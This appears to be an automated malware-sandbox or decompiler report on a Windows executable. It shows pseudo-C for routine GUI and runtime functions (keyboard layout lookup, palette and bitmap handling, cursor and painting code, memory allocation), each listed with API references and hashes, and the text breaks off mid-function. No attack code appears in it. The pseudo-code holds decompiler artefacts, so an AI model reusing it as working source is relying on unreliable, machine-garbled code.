Uniqueness Score: -1.00%

C-Code - Quality: 55%

E004334BC(void* __ebx, void* __esi, void* __eflags) { char _v8; struct HINSTANCE__* _v12; intOrPtr _v16; char _v26; char _v32; char _v36; intOrPtr _t63; void* _t66; void* _t67; intOrPtr _t68; void* _t69; _t69 = __eflags; _t47 = __ebx; _t66 = _t67; _t68 = _t67 + 0xffffffe0; _push(__ebx); _v32 = 0; _v36 = 0; _v8 = 0; _push(_t66); _push(0x4335ef); _push( *[fs:eax]); *[fs:eax] = _t68; _v26 = 0; GetKeyboardLayoutNameA( &_v26); _v16 = E00423918(1); _push(_t66); _push(0x4335c5); _push( *[fs:edx]); *[fs:edx] = _t68; E004239B8(_v16, 0x80000002); E004049AC( &_v36, 0xa, &_v26); E00404A4C( &_v32, _v36, "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\"); E00423A1C(_v16, __ebx, _v32, __esi); E00423C4C(_v16, &_v8, "Layout File", _t69); _v12 = E0040DDC0(_v8, _t47, 0x8000); _push(_t66); _push(0x4335a8); _push( *[fs:edx]); *[fs:edx] = _t68; *0x462548 = ( *( *(GetProcAddress(_v12, "KbdLayerDescriptor"))() + 0x28) & 1) == 1; _pop(_t63); *[fs:eax] = _t63; _push(0x4335af); return FreeLibrary(_v12); } 0x004334bc 0x004334bc 0x004334bd 0x004334bf 0x004334c2 0x004334c5 0x004334c8 0x004334cb 0x004334d0 0x004334d1 0x004334d6 0x004334d9 0x004334dc 0x004334e4 0x004334f5 0x004334fa 0x004334fb 0x00433500 0x00433503 0x0043350e 0x0043351e 0x0043352e 0x00433539 0x00433549 0x0043355b 0x00433560 0x00433561 0x00433566 0x00433569 0x0043358a 0x00433593 0x00433596 0x00433599 0x004335a7

APIs

GetKeyboardLayoutNameA.USER32 ref: 004334E4 Part of subcall function 004239B8: RegCloseKey.ADVAPI32(10CC0000,00423894,00000001,00423936,?,?,0042AD66,00000008,00000060,00000048,00000000,0042AE0B), ref: 004239CC Part of subcall function 00423A1C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88 Part of subcall function 0040DDC0: SetErrorMode.KERNEL32 ref: 0040DDCA Part of subcall function 0040DDC0: LoadLibraryA.KERNEL32(00000000,00000000,0040DE14,?,00000000,0040DE32), ref: 0040DDF9 GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 00433575 FreeLibrary.KERNEL32(?,004335AF,?,00000000,00000000,004335EF), ref: 004335A2

Strings

\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ , xrefs: 00433529 Layout File , xrefs: 00433541 KbdLayerDescriptor , xrefs: 0043356C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ API String ID: 3365787578-2194312379 Opcode ID: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06 Instruction ID: b7f935374733f2b043a6a9212af3645c2f8cc5f46ad59cc71e04b143bdb154a3 Opcode Fuzzy Hash: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06 Instruction Fuzzy Hash: 9221B2B0E00209BFCB01EFA5C85299EBBB6EB8D704F518476F400A7750D77DAA41CB58

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%

E004231B8(intOrPtr _a4, intOrPtr* _a8) { void _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t24; int _t25; intOrPtr _t27; intOrPtr _t28; intOrPtr* _t30; intOrPtr* _t32; _t30 = _a8; _t28 = _a4; if( *0x46633e != 0) { _t25 = 0; if(_t28 == 0x12340042 && _t30 != 0 && *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) { *((intOrPtr*)(_t30 + 4)) = 0; *((intOrPtr*)(_t30 + 8)) = 0; *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0); *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t32 = _t30; *(_t32 + 0x24) = 1; if( *_t32 >= 0x48) { lstrcpyA(_t32 + 0x28, "DISPLAY"); } _t25 = 1; } } else { _t27 = *0x466328; // 0x4231b8 *0x466328 = E00422CE4(6, _t24, _t27, _t28, _t30); _t25 = *0x466328(_t28, _t30); } return _t25; } 0x004231c1 0x004231c4 0x004231ce 0x004231f3 0x004231fb 0x0042321b 0x00423220 0x0042322b 0x00423236 0x00423240 0x00423241 0x00423242 0x00423243 0x00423244 0x00423245 0x0042324f 0x0042325a 0x0042325a 0x0042325f 0x0042325f 0x004231d0 0x004231d5 0x004231e2 0x004231ef 0x004231ef 0x00423269

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423210 GetSystemMetrics.USER32 ref: 00423225 GetSystemMetrics.USER32 ref: 00423230 lstrcpyA.KERNEL32(?,DISPLAY), ref: 0042325A Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

GetMonitorInfoW , xrefs: 004231D0 DISPLAY , xrefs: 00423251

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy String ID: DISPLAY$GetMonitorInfoW API String ID: 2545840971-2774842281 Opcode ID: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d Instruction ID: 96bab24b47e879cbfe0bd9bf5b7a96c5a668f0bc15fc1324eeb591fd9e87288a Opcode Fuzzy Hash: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d Instruction Fuzzy Hash: 5B119071B00320AED720CF65AC447A7B7A8EB05721F40456AED4597350D6B8BA44CBA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E00428588(int __eax, void* __ecx, intOrPtr __edx) { intOrPtr _v8; struct HDC__* _v12; struct HDC__* _v16; void* _v20; struct tagRGBQUAD _v1044; int _t16; int _t37; intOrPtr _t44; void* _t46; void* _t49; void* _t51; intOrPtr _t52; _t16 = __eax; _t49 = _t51; _t52 = _t51 + 0xfffffbf0; _v8 = __edx; _t46 = __eax; if(__eax == 0 || *((short*)(__ecx + 0x26)) > 8) { L4: return _t16; } else { _t16 = E004273B0(_v8, 0xff, &_v1044); _t37 = _t16; if(_t37 == 0) { goto L4; } else { _v12 = GetDC(0); _v16 = CreateCompatibleDC(_v12); _v20 = SelectObject(_v16, _t46); _push(_t49); _push(0x428637); _push( *[fs:eax]); *[fs:eax] = _t52; SetDIBColorTable(_v16, 0, _t37, &_v1044); _pop(_t44); *[fs:eax] = _t44; _push(0x42863e); SelectObject(_v16, _v20); DeleteDC(_v16); return ReleaseDC(0, _v12); } } } 0x00428588 0x00428589 0x0042858b 0x00428593 0x00428596 0x0042859a 0x0042863e 0x00428643 0x004285ab 0x004285b9 0x004285be 0x004285c2 0x00000000 0x004285c4 0x004285cb 0x004285d7 0x004285e4 0x004285e9 0x004285ea 0x004285ef 0x004285f2 0x00428603 0x0042860a 0x0042860d 0x00428610 0x0042861d 0x00428626 0x00428636 0x00428636 0x004285c2

APIs

Part of subcall function 004273B0: GetObjectA.GDI32(?,00000004), ref: 004273C7 Part of subcall function 004273B0: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 004273EA GetDC.USER32(00000000), ref: 004285C6 CreateCompatibleDC.GDI32(?), ref: 004285D2 SelectObject.GDI32(?), ref: 004285DF SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428637,?,?,?,?,00000000), ref: 00428603 SelectObject.GDI32(?,?), ref: 0042861D DeleteDC.GDI32(?), ref: 00428626 ReleaseDC.USER32 ref: 00428631

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable String ID: API String ID: 4046155103-0 Opcode ID: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c Instruction ID: fc760d696f5b6bfeae7a67bf9a168a54974abfe34dfe22b54ea61c4cebc6b826 Opcode Fuzzy Hash: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c Instruction Fuzzy Hash: 72119371E052186BDB10EBE9DC51EAEB3FCEF08704F4144BAB614E7680DA799D508B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E00454B28(struct HICON__* __eax, short __edx) { short _v18; long _v20; struct tagPOINT _v28; struct HICON__* _t11; long _t16; struct HICON__* _t25; struct HWND__* _t28; short _t29; struct tagPOINT* _t31; _t11 = __eax; _t29 = __edx; _t25 = __eax; if(__edx == *((intOrPtr*)(__eax + 0x44))) { L6: *((intOrPtr*)(_t25 + 0x48)) = *((intOrPtr*)(_t25 + 0x48)) + 1; return _t11; } *((short*)(__eax + 0x44)) = __edx; if(__edx != 0) { L5: _t11 = SetCursor(E00454B00(_t25, _t29)); goto L6; } GetCursorPos(_t31); _push(_v28.y); _t28 = WindowFromPoint(_v28.x); if(_t28 == 0) { goto L5; } _t16 = GetWindowThreadProcessId(_t28, 0); if(_t16 != GetCurrentThreadId()) { goto L5; } _v20 = _v28 & 0x0000ffff; _v18 = _v28.y & 0x0000ffff; return SendMessageA(_t28, 0x20, _t28, SendMessageA(_t28, 0x84, 0, _v20) & 0x0000ffff | 0x02000000); } 0x00454b28 0x00454b2f 0x00454b31 0x00454b37 0x00454bb7 0x00454bb7 0x00000000 0x00454bb7 0x00454b39 0x00454b40 0x00454ba7 0x00454bb2 0x00000000 0x00454bb2 0x00454b43 0x00454b48 0x00454b55 0x00454b59 0x00000000 0x00000000 0x00454b5e 0x00454b6c 0x00000000 0x00000000 0x00454b72 0x00454b7c 0x00000000

APIs

GetCursorPos.USER32 ref: 00454B43 WindowFromPoint.USER32(?,?), ref: 00454B50 GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454B5E GetCurrentThreadId.KERNEL32 ref: 00454B65 SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00454B8E SendMessageA.USER32(00000000,00000020,00000000,?), ref: 00454BA0 SetCursor.USER32(00000000), ref: 00454BB2

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess String ID: API String ID: 1770779139-0 Opcode ID: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9 Instruction ID: 855e5610ba6024dcea5ecb996c65caa1e9501b556084f3035492505de70d9607 Opcode Fuzzy Hash: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9 Instruction Fuzzy Hash: 9E01D63150824066C6207B668C81F3B36A4DFC4B59F10446FBE88AA2D2E63DEC44936E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%

E0044F90C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) { intOrPtr* _v8; intOrPtr* _v12; struct HDC__* _v16; struct tagPAINTSTRUCT _v80; struct tagRECT _v96; struct tagRECT _v112; signed int _v116; long _v120; void* __ebp; void* _t68; void* _t94; struct HBRUSH__* _t97; intOrPtr _t105; void* _t118; void* _t127; intOrPtr _t140; intOrPtr _t146; void* _t147; void* _t148; void* _t150; void* _t152; intOrPtr _t153; _t148 = __esi; _t147 = __edi; _t138 = __edx; _t127 = __ebx; _t150 = _t152; _t153 = _t152 + 0xffffff8c; _v12 = __edx; _v8 = __eax; _t68 = *_v12 - 0xf; if(_t68 == 0) { _v16 = *(_v12 + 4); if(_v16 == 0) { *(_v12 + 4) = BeginPaint( *(_v8 + 0x29c), &_v80); } _push(_t150); _push(0x44fada); _push( *[fs:eax]); *[fs:eax] = _t153; if(_v16 == 0) { GetWindowRect( *(_v8 + 0x29c), &_v96); E0043A55C(_v8, &_v120, &_v96); _v96.left = _v120; _v96.top = _v116; E00439028( *(_v12 + 4), ~(_v96.top), ~(_v96.left)); } E0043FDA8(_v8, _t127, _v12, _t147, _t148); _pop(_t140); *[fs:eax] = _t140; _push(0x44fae8); if(_v16 == 0) { return EndPaint( *(_v8 + 0x29c), &_v80); } return 0; } else { _t94 = _t68 - 5; if(_t94 == 0) { _t97 = E004261BC( *((intOrPtr*)(_v8 + 0x1a4))); *((intOrPtr*)( *_v8 + 0x44))(); FillRect( *(_v12 + 4), &_v112, _t97); if( *((char*)(_v8 + 0x277)) == 2 && *(_v8 + 0x29c) != 0) { GetClientRect( *(_v8 + 0x29c), &_v96); FillRect( *(_v12 + 4), &_v96, E004261BC( *((intOrPtr*)(_v8 + 0x1a4)))); } _t105 = _v12; *((intOrPtr*)(_t105 + 0xc)) = 1; } else { _t118 = _t94 - 0x2b; if(_t118 == 0) { E0044F880(_t150); _t105 = _v8; if( *((char*)(_t105 + 0x277)) == 2) { if(E00450190(_v8) == 0 || E0044F8CC(_t138, _t150) == 0) { _t146 = 1; } else { _t146 = 0; } _t105 = E0044C934( *(_v8 + 0x29c), _t146); } } else { if(_t118 != 0x45) { _t105 = E0044F880(_t150); } else { E0044F880(_t150); _t105 = _v12; if( *((intOrPtr*)(_t105 + 0xc)) == 1) { _t105 = _v12; *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff; } } } } return _t105; } } 0x0044f90c 0x0044f90c 0x0044f90c 0x0044f90c 0x0044f90d 0x0044f90f 0x0044f912 0x0044f915 0x0044f91d 0x0044f920 0x0044fa30 0x0044fa37 0x0044fa4f 0x0044fa4f 0x0044fa54 0x0044fa55 0x0044fa5a 0x0044fa5d 0x0044fa64 0x0044fa74 0x0044fa82 0x0044fa8a 0x0044fa90 0x0044faa3 0x0044faa3 0x0044faae 0x0044fab5 0x0044fab8 0x0044fabb 0x0044fac4 0x00000000 0x0044fad4 0x0044fad9 0x0044f926 0x0044f926 0x0044f929 0x0044f969 0x0044f977 0x0044f985 0x0044f994 0x0044f9b0 0x0044f9cf 0x0044f9cf 0x0044f9d4 0x0044f9d7 0x0044f92b 0x0044f92b 0x0044f92e 0x0044f9e4 0x0044f9ea 0x0044f9f4 0x0044fa04 0x0044fa15 0x0044fa11 0x0044fa11 0x0044fa11 0x0044fa20 0x0044fa20 0x0044f934 0x0044f937 0x0044fae2 0x0044f93d 0x0044f93e 0x0044f944 0x0044f94b 0x0044f951 0x0044f954 0x0044f954 0x0044f94b 0x0044f937 0x0044f92e 0x0044faeb 0x0044faeb

APIs

FillRect.USER32 ref: 0044F985 GetClientRect.USER32 ref: 0044F9B0 FillRect.USER32 ref: 0044F9CF Part of subcall function 0044F880: CallWindowProcA.USER32 ref: 0044F8BA BeginPaint.USER32(?,?), ref: 0044FA47 GetWindowRect.USER32 ref: 0044FA74 EndPaint.USER32(?,?,0044FAE8), ref: 0044FAD4

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc String ID: API String ID: 901200654-0 Opcode ID: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60 Instruction ID: 44bf8864a589ba947b4fad5018ef312e79812de65eda3363066782ea35254d35 Opcode Fuzzy Hash: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60 Instruction Fuzzy Hash: A851EB74A00108EFDB00DBA9D589E9EB7F8AF09314F6581B6E409AB352D738AE45CB15

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%

E00427660(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) { intOrPtr* _v8; intOrPtr _v12; signed int _v16; intOrPtr _v20; signed int _v24; signed int _v32; struct HDC__* _v44; signed int* _t36; signed int _t39; signed int _t42; signed int* _t52; signed int _t56; intOrPtr _t66; void* _t72; void* _t73; void* _t74; intOrPtr _t75; _t73 = _t74; _t75 = _t74 + 0xffffff90; _v16 = __ecx; _v12 = __edx; _v8 = __eax; _t52 = _a8; _v24 = _v16 << 4; _v20 = E00402CF4(_v24); *[fs:edx] = _t75; _t56 = _v24; *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x427959, _t73, __edi, __esi, __ebx, _t72); if(( *_t52 | _t52[1]) != 0) { _t36 = _a4; *_t36 = *_t52; _t36[1] = _t52[1]; } else { *_a4 = GetSystemMetrics(0xb); _a4[1] = GetSystemMetrics(0xc); } _v44 = GetDC(0); if(_v44 == 0) { E00426B18(_t56); } _push(_t73); _push(0x427749); _push( *[fs:edx]); *[fs:edx] = _t75; _t39 = GetDeviceCaps(_v44, 0xe); _t42 = _t39 * GetDeviceCaps(_v44, 0xc); if(_t42 <= 8) { _v32 = 1 << _t42; } else { _v32 = 0x7fffffff; } _pop(_t66); *[fs:eax] = _t66; _push(0x427750); return ReleaseDC(0, _v44); } 0x00427661 0x00427663 0x00427669 0x0042766c 0x0042766f 0x00427672 0x0042767b 0x00427686 0x00427694 0x0042769a 0x004276a2 0x004276aa 0x004276c7 0x004276cc 0x004276d1 0x004276ac 0x004276b6 0x004276c2 0x004276c2 0x004276db 0x004276e2 0x004276e4 0x004276e4 0x004276eb 0x004276ec 0x004276f1 0x004276f4 0x004276fd 0x00427713 0x00427719 0x0042772d 0x0042771b 0x0042771b 0x0042771b 0x00427732 0x00427735 0x00427738 0x00427748

APIs

GetSystemMetrics.USER32 ref: 004276AE GetSystemMetrics.USER32 ref: 004276BA GetDC.USER32(00000000), ref: 004276D6 GetDeviceCaps.GDI32(00000000,0000000E), ref: 004276FD GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042770A ReleaseDC.USER32 ref: 00427743

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystem$Release String ID: API String ID: 447804332-0 Opcode ID: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773 Instruction ID: 73986ba3f22e50cd3a10517d1b4e47993adae367a89b78d8e0850655de09d4be Opcode Fuzzy Hash: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773 Instruction Fuzzy Hash: 72314374E04255DFEB00DF65C881AAEBBF5FB49310F50816AF914AB381C678AD41CB69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E00427AC0(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) { char _v5; struct HPALETTE__* _v12; struct HDC__* _v16; struct tagBITMAPINFO* _t36; intOrPtr _t43; struct HBITMAP__* _t47; void* _t50; void* _t56; _t36 = __ecx; _t47 = __eax; E0042796C(__eax, _a4, __ecx, _t56); _v12 = 0; _v16 = CreateCompatibleDC(0); _push(_t50); _push(0x427b5d); _push( *[fs:eax]); *[fs:eax] = _t50 + 0xfffffff4; if(__edx != 0) { _v12 = SelectPalette(_v16, __edx, 0); RealizePalette(_v16); } _v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0; _pop(_t43); *[fs:eax] = _t43; _push(E00427B64); if(_v12 != 0) { SelectPalette(_v16, _v12, 0); } return DeleteDC(_v16); } 0x00427ac9 0x00427acd 0x00427ad6 0x00427add 0x00427ae7 0x00427aec 0x00427aed 0x00427af2 0x00427af5 0x00427afa 0x00427b08 0x00427b0f 0x00427b0f 0x00427b2d 0x00427b33 0x00427b36 0x00427b39 0x00427b42 0x00427b4e 0x00427b4e 0x00427b5c

APIs

Part of subcall function 0042796C: GetObjectA.GDI32(?,00000054), ref: 00427980 CreateCompatibleDC.GDI32(00000000), ref: 00427AE2 SelectPalette.GDI32(?,00000000,00000000), ref: 00427B03 RealizePalette.GDI32(?), ref: 00427B0F GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00427B26 SelectPalette.GDI32(?,00000000,00000000), ref: 00427B4E DeleteDC.GDI32(?), ref: 00427B57

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize String ID: API String ID: 1221726059-0 Opcode ID: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492 Instruction ID: 962af5e7cc7204e74324ac0cd40ad7ab2ef4d8fef8aaa126dedc15750c7fb750 Opcode Fuzzy Hash: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492 Instruction Fuzzy Hash: C2118F75B04304BBDB10DBA9CC81F5EBBFCEF49704F5184AAB514E7281D678A9008768

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0042730C(void* __eax, signed short __ecx) { char _v1036; signed short _v1038; struct tagRGBQUAD _v1048; short _v1066; void* __ebx; void* _t19; void* _t24; struct HDC__* _t25; void* _t29; void* _t32; struct HPALETTE__* _t34; LOGPALETTE* _t35; _t32 = __eax; _t34 = 0; _t35->palVersion = 0x300; if(__eax == 0) { _v1038 = __ecx; E00402EFC(_t29, _t24, __ecx + __ecx + __ecx + __ecx, &_v1036); } else { _t25 = CreateCompatibleDC(0); _t19 = SelectObject(_t25, _t32); _v1066 = GetDIBColorTable(_t25, 0, 0x100, &_v1048); SelectObject(_t25, _t19); DeleteDC(_t25); } if(_v1038 != 0) { if(_v1038 != 0x10 || E00427274(_t35) == 0) { E00427108( &_v1036, _v1038 & 0x0000ffff); } _t34 = CreatePalette(_t35); } return _t34; } 0x00427315 0x00427317 0x00427319 0x00427321 0x0042735b 0x0042736a 0x00427323 0x0042732a 0x0042732e 0x00427347 0x0042734e 0x00427354 0x00427354 0x00427375 0x0042737d 0x00427393 0x00427393 0x004273a0 0x004273a0 0x004273ad

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00427325 SelectObject.GDI32(00000000,00000000), ref: 0042732E GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00429843,?,?,?,?,00428423), ref: 00427342 SelectObject.GDI32(00000000,00000000), ref: 0042734E DeleteDC.GDI32(00000000), ref: 00427354 CreatePalette.GDI32 ref: 0042739B

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable String ID: API String ID: 2515223848-0 Opcode ID: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92 Instruction ID: 4a95b8b0959ba2db041035c6acb415e503d43549d7c2ca44117eec6569594a82 Opcode Fuzzy Hash: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92 Instruction Fuzzy Hash: 4501C46130C32062E614B3269C43B6F72F89FC0718F55C82FB989A72C2E67D8804939E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004269F4(void* __eax) { void* _t36; _t36 = __eax; UnrealizeObject(E004261BC( *((intOrPtr*)(__eax + 0x14)))); SelectObject( *(_t36 + 4), E004261BC( *((intOrPtr*)(_t36 + 0x14)))); if(E0042629C( *((intOrPtr*)(_t36 + 0x14))) != 0) { SetBkColor( *(_t36 + 4), !(E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14)))))); return SetBkMode( *(_t36 + 4), 1); } else { SetBkColor( *(_t36 + 4), E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14))))); return SetBkMode( *(_t36 + 4), "true"); } } 0x004269f5 0x00426a00 0x00426a12 0x00426a21 0x00426a5b 0x00426a6c 0x00426a23 0x00426a35 0x00426a46 0x00426a46

APIs

Part of subcall function 004261BC: CreateBrushIndirect.GDI32(?), ref: 00426267 UnrealizeObject.GDI32(00000000), ref: 00426A00 SelectObject.GDI32(?,00000000), ref: 00426A12 SetBkColor.GDI32(?,00000000), ref: 00426A35 SetBkMode.GDI32(?,?), ref: 00426A40 SetBkColor.GDI32(?,00000000), ref: 00426A5B SetBkMode.GDI32(?,00000001), ref: 00426A66 Part of subcall function 00425400: GetSysColor.USER32(E8C38BD6), ref: 0042540A

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize String ID: API String ID: 3527656728-0 Opcode ID: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f Instruction ID: 79df315320e9c6d7b3654dfc87e14d29fd340cea2b97e5c1a1a8a26441f2275c Opcode Fuzzy Hash: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f Instruction Fuzzy Hash: 98F06BB57001109BDB04FFBAE9C6E1B6BA85F04309755449AB909DF197C939E8208739

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E00401820(signed int __eax) { signed int __ebx; signed int __edi; signed int __esi; intOrPtr* _t99; signed int _t104; signed int _t109; signed int _t110; intOrPtr* _t114; void* _t116; intOrPtr* _t121; signed int _t125; signed int _t129; signed int _t131; signed int _t132; signed int _t133; signed int _t134; signed int _t135; unsigned int _t141; signed int _t142; void* _t144; intOrPtr* _t147; intOrPtr _t148; signed int _t150; long _t156; intOrPtr _t159; signed int _t162; _t129 = *0x46304d; // 0x0 if(__eax > 0xa2c) { __eflags = __eax - 0x40a2c; if(__eax > 0x40a2c) { _pop(_t120); __eflags = __eax; if(__eax >= 0) { _push(_t120); _t162 = __eax; _t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000; _t121 = VirtualAlloc(0, _t156, 0x101000, 4); if(_t121 != 0) { _t147 = _t121; *((intOrPtr*)(_t147 + 8)) = _t162; *(_t147 + 0xc) = _t156 | 0x00000004; E00401740(); _t99 = *0x4657b0; // 0x4657ac *_t147 = 0x4657ac; *0x4657b0 = _t121; *((intOrPtr*)(_t147 + 4)) = _t99; *_t99 = _t121; *0x4657a8 = 0; _t121 = _t121 + 0x10; } return _t121; } else { __eflags = 0; return 0; } } else { _t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30; __eflags = _t129; if(__eflags != 0) { while(1) { asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { goto L39; } Sleep(0); asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L39; } } L39: _t141 = _t125 